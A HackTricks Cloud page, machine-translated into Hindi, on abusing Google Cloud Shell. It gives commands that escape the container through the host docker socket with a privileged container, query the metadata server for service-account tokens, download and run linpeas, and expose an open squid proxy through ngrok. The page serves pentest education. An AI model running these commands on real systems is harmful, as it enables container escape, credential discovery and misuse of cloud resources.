htARTE (HackTricks AWS Red Team Expert) के साथ जीरो से हीरो तक AWS हैकिंग सीखें!हैकट्रिक्स का समर्थन करने के अन्य तरीके:
यदि आप अपनी कंपनी का विज्ञापन हैकट्रिक्स में देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
क्लाउड शैल
क्लाउड शैल के बारे में अधिक जानकारी के लिए देखें:
page GCP - Cloud Shell Enum कंटेनर एस्केप
ध्यान दें कि Google क्लाउड शैल एक कंटेनर के अंदर चलता है, आप आसानी से मेज़बान की ओर बाहर निकल सकते हैं इस तरह:
Copy sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
यह google द्वारा एक विकल्प माना नहीं जाता है, लेकिन यह आपको उस वातावरण में क्या हो रहा है का एक व्यापक दृश्य प्रदान करता है।
इसके अतिरिक्त, ध्यान दें कि होस्ट से आप एक सेवा खाता टोकन खोज सकते हैं:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
निम्नलिखित स्कोप के साथ:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
लिनपीएस के साथ मेटाडेटा की जांच करें:
Copy cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
गिथब का उपयोग करने के बाद https://github.com/carlospolop/bf_my_gcp_permissions सेवा खाते के टोकन के साथ कोई अनुमति खोजी नहीं गई ...
प्रॉक्सी के रूप में उसका उपयोग करें
यदि आप अपने गूगल क्लाउड शैल इंस्टेंस को प्रॉक्सी के रूप में उपयोग करना चाहते हैं तो निम्नलिखित कमांड चलाने की आवश्यकता है (या उन्हें .bashrc फ़ाइल में डालें):
Copy sudo apt install -y squid
केवल आपको बताने के लिए, Squid एक http प्रॉक्सी सर्वर है। निम्नलिखित सेटिंग्स के साथ एक squid.conf फ़ाइल बनाएं:
Copy http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0 .0.0/0
http_access allow all
कॉपी करें squid.conf फ़ाइल को /etc/squid
Copy sudo cp squid.conf /etc/squid
अंत में स्क्विड सेवा चलाएं:
Copy sudo service squid start
बाहर से प्रॉक्सी को उपलब्ध करने के लिए ngrok का उपयोग करें:
चलाने के बाद, tcp:// url की कॉपी करें। अगर आप ब्राउज़र से प्रॉक्सी चलाना चाहते हैं तो सुझाव दिया जाता है कि tcp:// हिस्सा और पोर्ट को हटा दें और पोर्ट को अपने ब्राउज़र प्रॉक्सी सेटिंग्स के पोर्ट फ़ील्ड में डालें (squid एक http प्रॉक्सी सर्वर है)।
स्टार्टअप के लिए बेहतर उपयोग के लिए .bashrc फ़ाइल में निम्नलिखित लाइन होनी चाहिए:
Copy sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok ; ./ngrok tcp 3128
इन निर्देशों को https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key से कॉपी किया गया था। किसी भी प्रकार के सॉफ्टवेयर (डेटाबेस और यहाँ तक कि विंडोज) को क्लाउड शैल में चलाने के लिए अन्य पागल विचारों के लिए उस पेज की जाँच करें।
शून्य से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert) के साथ! HackTricks का समर्थन करने के अन्य तरीके:
यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स की जाँच करें!
हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
Last updated 3 months ago